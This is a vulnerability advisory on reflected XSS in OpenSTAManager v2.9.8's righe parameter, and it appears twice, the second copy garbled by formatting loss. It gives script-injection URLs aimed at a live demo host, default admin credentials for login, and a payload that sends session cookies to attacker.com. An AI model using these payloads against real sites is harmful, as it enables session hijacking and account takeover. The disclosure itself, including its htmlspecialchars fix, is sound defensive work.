Summary
Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.
Vulnerable Parameter: righe (GET)
Details
OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.
Vulnerable Code Location:
File: /modules/contratti/modals/modifica_iva.php (Line 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.
All Affected Files:
/modules/contratti/modals/modifica_iva.php - Line 125, Line 167
/modules/preventivi/modals/modifica_iva.php - Line 125, Line 167
/modules/fatture/modals/modifica_iva.php - Line 121, Line 161
/modules/ddt/modals/modifica_iva.php - Line 125, Line 167
/modules/ordini/modals/modifica_iva.php - Line 125, Line 167
/modules/interventi/modals/modifica_iva.php - Line 125, Line 167
PoC
Prerequisites:
- Running instance of OpenSTAManager v2.9.8
- Valid admin credentials (username: admin, password: admin for test instance)
Step 1: Login
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Step 2: Trigger XSS
Navigate to the following URL in a browser (or use curl with cookies):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
Tested URLs (All vulnerable):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
Expected Result:
JavaScript alert popup displays showing the current session cookie, confirming code execution.
HTML Output (verified on live instance):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Verification:
Alternative Payloads:
Session stealing: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Impact
Affected Users: All authenticated users with access to contracts, invoices, quotes, or orders modules.
Attack Scenario:
- Attacker crafts malicious URL with XSS payload
- Attacker sends URL to victim via email/chat/phishing
- Victim (authenticated user) clicks the link
- Malicious JavaScript executes in victim's browser context
- Attacker can:
- Steal session cookies → Full account takeover
- Perform actions on behalf of victim (create/modify/delete records)
- Steal CSRF tokens and bypass CSRF protection
- Redirect to phishing page
- Inject keylogger to capture sensitive data
- Modify page content to trick user into revealing credentials
Recommended Fix:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Apply this fix to all affected files listed in Details section.
Summary
Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.
Vulnerable Parameter:
righe(GET)Details
OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the
righeGET parameter before reflecting it in HTML output.Vulnerable Code Location:
File:
/modules/contratti/modals/modifica_iva.php(Line 125)The
$_GET['righe']parameter is directly echoed into the HTMLvalueattribute without any sanitization usinghtmlspecialchars()or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.All Affected Files:
/modules/contratti/modals/modifica_iva.php- Line 125, Line 167/modules/preventivi/modals/modifica_iva.php- Line 125, Line 167/modules/fatture/modals/modifica_iva.php- Line 121, Line 161/modules/ddt/modals/modifica_iva.php- Line 125, Line 167/modules/ordini/modals/modifica_iva.php- Line 125, Line 167/modules/interventi/modals/modifica_iva.php- Line 125, Line 167PoC
Prerequisites:
Step 1: Login
Step 2: Trigger XSS
Navigate to the following URL in a browser (or use curl with cookies):
Tested URLs (All vulnerable):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Expected Result:
JavaScript alert popup displays showing the current session cookie, confirming code execution.
HTML Output (verified on live instance):
Verification:
Alternative Payloads:
Session stealing:
"><script>fetch('https://attacker.com/?c='+document.cookie)</script>Impact
Affected Users: All authenticated users with access to contracts, invoices, quotes, or orders modules.
Attack Scenario:
Recommended Fix:
Apply this fix to all affected files listed in Details section.